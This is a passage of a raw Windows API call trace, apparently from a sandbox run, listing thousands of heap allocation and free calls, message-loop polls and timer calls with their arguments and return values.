hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0149.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0149.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0149.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0149.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0149.353] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0149.353] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0149.353] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0149.353] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0149.354] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0149.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0149.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0149.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0149.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0149.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0149.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0149.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0149.354] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0149.354] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0149.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0149.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0149.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0149.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0149.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0149.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0149.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0149.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0149.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0149.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0149.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0149.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0149.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0149.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0149.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0149.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0149.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0149.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0149.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0149.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0149.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0149.357] CharLowerBuffW (in: lpsz="byte[89336]", cchLength=0xb | out: lpsz="byte[89336]") returned 0xb [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0149.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0149.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0149.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0149.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0149.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0149.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0149.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf8) returned 0x2e96028 [0149.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0149.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0149.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0149.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0149.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0149.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0149.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0149.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0149.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0149.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0149.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0149.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0149.363] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0149.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0149.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0149.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0149.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0149.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0149.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0149.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0149.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf0) returned 0x2eabd28 [0149.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0149.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf0) returned 0x2ec1a20 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eabd28 | out: hHeap=0x970000) returned 1 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0149.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec1a20 | out: hHeap=0x970000) returned 1 [0149.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0149.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0149.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0149.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0149.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0149.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0149.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0149.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0149.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0149.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0149.373] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0149.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0149.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0149.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0149.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0149.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0149.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0149.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0149.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0149.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0149.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0149.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0149.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0149.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0149.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0149.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0149.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0149.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0149.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0149.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0149.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, 